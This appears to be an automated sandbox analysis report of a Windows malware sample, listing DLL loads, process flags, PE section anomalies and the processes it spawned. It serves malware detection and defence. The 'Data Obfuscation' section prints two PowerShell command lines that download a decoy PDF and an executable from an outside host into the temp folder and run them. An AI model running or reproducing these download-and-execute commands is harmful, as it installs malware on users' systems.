Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: softy.pdb source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD6E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1842069784.000002BB1BE05000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Management.resourcesn.pdb^ source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb6 source: powershell.exe, 00000010.00000002.1841523083.000002BB1BD81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000010.00000002.1842069784.000002BB1BE05000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\lg1wwLsmCX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: initial sample Static PE information: section where entry point is pointing to: T10B924G
Source: lg1wwLsmCX.exe Static PE information: real checksum: 0x19cbc should be: 0x1e859
Source: lg1wwLsmCX.exe Static PE information: section name: T10B924G
Source: lg1wwLsmCX.exe Static PE information: section name: G8MCUXOZ
Source: lg1wwLsmCX.exe Static PE information: section name: Z2TXZQUP
Source: lg1wwLsmCX.exe Static PE information: section name: SRW4MTG9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF7C02345E5 pushad ; ret 5_2_00007FF7C02345FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C02463FA pushad ; iretd 16_2_00007FF7C02463FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C02463EA push eax; iretd 16_2_00007FF7C02463EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C024842E pushad ; ret 16_2_00007FF7C024845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C0247C2E pushad ; retf 16_2_00007FF7C0247C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C024845E push eax; ret 16_2_00007FF7C024846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C0247C5E push eax; retf 16_2_00007FF7C0247C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C024A54D push eax; retf 16_2_00007FF7C024A551
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C02445E5 pushad ; ret 16_2_00007FF7C02445FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C0245FFA pushad ; retf 16_2_00007FF7C0245FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FF7C0245FEA push eax; retf 16_2_00007FF7C0245FEB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
